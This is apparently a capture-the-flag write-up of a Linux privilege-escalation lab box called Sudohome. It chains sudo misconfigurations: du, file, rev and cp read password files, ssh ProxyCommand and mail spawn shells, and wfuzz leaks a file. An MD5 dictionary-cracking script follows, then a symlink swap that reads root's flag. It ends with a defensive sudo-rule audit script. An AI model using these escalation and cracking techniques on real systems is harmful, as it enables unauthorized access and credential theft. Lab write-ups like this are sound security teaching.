Reproducing the Sudohome box set by a group member
Sudohome
nmap -p- 192.168.5.91
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-04 12:11 EST
Nmap scan report for zero.hmv (192.168.5.91)
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
MAC Address: 08:00:27:3A:DD:4C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Port 80 only hints at ssh. Trying ssh, the banner hands out user1's credentials, so log in directly.
Check sudo -l; it looks like this box is a chain of repeated lateral moves between users.
1->2(du)
sudo -l
Matching Defaults entries for user1 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User user1 may run the following commands on SudoHome:
(user2) NOPASSWD: /usr/bin/du
Look at du's options with du --help, and note that a password file exists in user2's home directory: the intent is to make du read the password to get user2's privileges. --files0-from=F reads a NUL-separated list of file names from file F; with password.txt as F, the password is printed in du's error message.
sudo -u user2 du --files0-from=/home/user2/password.txt
du: cannot access 'tLPi3BLMG2zmwvZ5z9rh'$'\n': No such file or directory
2->3(file)
file can be run without a password; a group member put this one in a box before. The -f option reads file names line by line and tries to examine each one, so the password shows up in the error output.
sudo -u user3 file -f /home/user3/password.txt
TFqxDyfGO69DP1lyjt0f: cannot open `TFqxDyfGO69DP1lyjt0f' (No such file or directory)
3->4 (mc)
mc can be run without a password; note -U, --subshell Enables subshell support (default), which opens an interactive shell as user4.
The password read out is B0aWh2XHpp5hOIVtCUbn
4->5(ssh)
ssh can be run without a password. GTFOBins has a ready-made entry.
user4@SudoHome:~$ sudo -u user5 ssh -o ProxyCommand=';sh 0<&2 1>&2' x
$ cat /home/user5/password.txt
GZ5KErjFycaYHZGj7GcI
5->6(rev)
This is no different from being handed cat directly.
sudo -u user6 rev /home/user6/password.txt
LowGbJGVAxhQw63UWc5Z
Just reverse it once more.
6->7(cp)
cp can be run without a password. Just copy the password file over a file you can read.
sudo -u user7 cp /home/user7/password.txt /home/user7/.profile
7->8(mail)
Use the ready-made GTFOBins trick, except that --exec is not supported here, so run the shell from mail's interactive prompt instead.
user7@SudoHome:~$ sudo -u user8 mail -f /home/user8/password.txt
Mail version 8.1.2 01/15/2001. Type ? for help.
"/home/user8/password.txt": 0 messages
& !/bin/bash
user8@SudoHome:/home/user7$ id
uid=1007(user8) gid=1007(user8) groups=1007(user8)
8->9(wfuzz)
Use the password file itself as the wordlist, so it shows up in the payload column.
sudo -u user9 wfuzz -w /home/user9/password.txt -u "http://127.0.0.1/FUZZ"
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://127.0.0.1/FUZZ
Total requests: 1
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 404 9 L 31 W 271 Ch "peqkSBCDKvVxxNwcq1j4"
Total time: 0
Processed Requests: 1
Filtered Requests: 0
Requests/sec.: 0
9->10(md5sum)
This one looks like a hash-cracking step.
The file is 13 bytes, probably a 12-character password plus a newline.
Just have an AI write a script.
#!/usr/bin/env python3
import hashlib
import os
import sys


def md5_crack(target_hash, dictionary_path):
    """
    MD5 Password Recovery Script
    For educational and legitimate security testing purposes only
    Args:
        target_hash (str): Target MD5 hash to crack
        dictionary_path (str): Path to wordlist file
    """
    line_num = 0  # defined up front so the interrupt handler can report it
    try:
        with open(dictionary_path, 'r', encoding='utf-8', errors='ignore') as file:
            for line_num, password in enumerate(file, 1):
                password = password.strip()  # Remove newline and whitespace
                # Hash calculation: password + newline character
                test_string = password + '\n'
                calculated_hash = hashlib.md5(test_string.encode('utf-8')).hexdigest()
                if calculated_hash == target_hash:
                    print(f"\n[SUCCESS] Password found: '{password}'")
                    print(f"Line number: {line_num}")
                    print(f"Hash verification: {calculated_hash}")
                    return password
                # Progress indicator
                if line_num % 100000 == 0:
                    print(f"Attempted {line_num:,} passwords...")
    except FileNotFoundError:
        print(f"[ERROR] Dictionary file not found: {dictionary_path}")
        return None
    except KeyboardInterrupt:
        print(f"\n[INTERRUPTED] Stopped at line {line_num}")
        return None
    print("\n[COMPLETE] Password not found in dictionary")
    return None


def main():
    # Target configuration
    target_hash = "65e31d336be184593812c18533fa4fa2"
    dictionary_path = "/usr/share/wordlists/rockyou.txt"
    print("=== MD5 Password Recovery Tool ===")
    print(f"Target Hash: {target_hash}")
    print(f"Dictionary: {dictionary_path}")
    print("Hash format: MD5(password + '\\n')")
    print("-" * 40)
    # Check if dictionary file exists
    if not os.path.exists(dictionary_path):
        print(f"[ERROR] Dictionary file not found: {dictionary_path}")
        print("Common locations:")
        print(" - /usr/share/wordlists/rockyou.txt")
        print(" - /usr/share/wordlists/rockyou.txt.gz (need to decompress)")
        print(" - ./rockyou.txt")
        sys.exit(1)
    # Start cracking
    result = md5_crack(target_hash, dictionary_path)
    if result:
        print(f"\n[RESULT] Recovered password: {result}")
    else:
        print("\n[RESULT] Password recovery failed")


if __name__ == "__main__":
    main()
Got the password:
python3 md5recov.py
=== MD5 Password Recovery Tool ===
Target Hash: 65e31d336be184593812c18533fa4fa2
Dictionary: /usr/share/wordlists/rockyou.txt
Hash format: MD5(password + '\n')
----------------------------------------
Attempted 100,000 passwords...
Attempted 200,000 passwords...
Attempted 300,000 passwords...
Attempted 400,000 passwords...
[SUCCESS] Password found: 'morrinsville'
Line number: 400474
Hash verification: 65e31d336be184593812c18533fa4fa2
[RESULT] Recovered password: morrinsville
user10->root
user10@SudoHome:~$ sudo -l
Matching Defaults entries for user10 on SudoHome:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User user10 may run the following commands on SudoHome:
(ALL) NOPASSWD: /usr/bin/cat /home/user10/.important
Files under /root cannot be read directly, so replace .important with a symlink (shortcut) to the root file; the allowed cat then follows the link.
user10@SudoHome:~$ rm .important
rm: remove write-protected regular file '.important'? y
user10@SudoHome:~$ ln -s /root/root.txt .important
user10@SudoHome:~$ sudo /usr/bin/cat /home/user10/.important
flag{root-f522d1d715970073a6413474ca0e0f63}
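As an added example that is not part of the original post, here is a small Python audit that parses sudo -l output in the format shown above and flags the two patterns this box chains: passwordless rules on binaries that can read files or spawn a shell, and a fixed argument path inside a user-writable directory that a symlink can redirect. The sample rule text, the binary set (taken from the steps above) and the writable-prefix list are constructed assumptions.

```python
import os
import re

# Constructed sample in the format `sudo -l` printed on the box
SAMPLE_SUDO_L = """\
User user10 may run the following commands on SudoHome:
    (ALL) NOPASSWD: /usr/bin/cat /home/user10/.important
    (user2) NOPASSWD: /usr/bin/du
    (root) /usr/bin/apt update
"""

# Binaries the walkthrough used to read a password file or spawn a shell;
# this set comes from the post, it is not a complete GTFOBins list.
FILE_READ_OR_SHELL = {"du", "file", "mc", "ssh", "rev", "cp", "mail",
                      "wfuzz", "md5sum", "cat"}

# Directories an unprivileged user can write to, so a fixed argument path
# there can be swapped for a symlink (assumed list, the root step above).
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)"
                     r"(?P<cmd>/\S+)(?P<args>.*)$")


def parse_rules(sudo_l_output):
    """Turn `sudo -l` rule lines into (runas, tags, cmd, args) tuples."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header and Defaults lines are skipped
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        rules.append((m.group("runas"), tags, m.group("cmd"), m.group("args").split()))
    return rules


def audit_rules(sudo_l_output):
    """Return findings as (runas, cmd, reason) for every risky rule."""
    findings = []
    for runas, tags, cmd, args in parse_rules(sudo_l_output):
        binary = os.path.basename(cmd)
        if "NOPASSWD" in tags and binary in FILE_READ_OR_SHELL:
            findings.append((runas, cmd, f"passwordless {binary} can read files or spawn a shell as {runas}"))
        for arg in args:
            if arg.startswith(USER_WRITABLE_PREFIXES):
                findings.append((runas, cmd, f"argument {arg} sits in a user-writable directory; a symlink there redirects the command"))
            if os.path.islink(arg):  # live check, only meaningful on the audited host
                findings.append((runas, cmd, f"{arg} is already a symlink to {os.path.realpath(arg)}"))
    return findings


if __name__ == "__main__":
    for runas, cmd, reason in audit_rules(SAMPLE_SUDO_L):
        print(f"[{runas}] {cmd}: {reason}")
```

Feeding it the real sudo -l output of each user on the box reproduces the chain as a list of findings; the fix for the last one is to have the rule point at a root-owned path outside any user-writable directory.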
This is basically a privilege-escalation lab; learned a lot.
Hardship and adversity polish you into jade.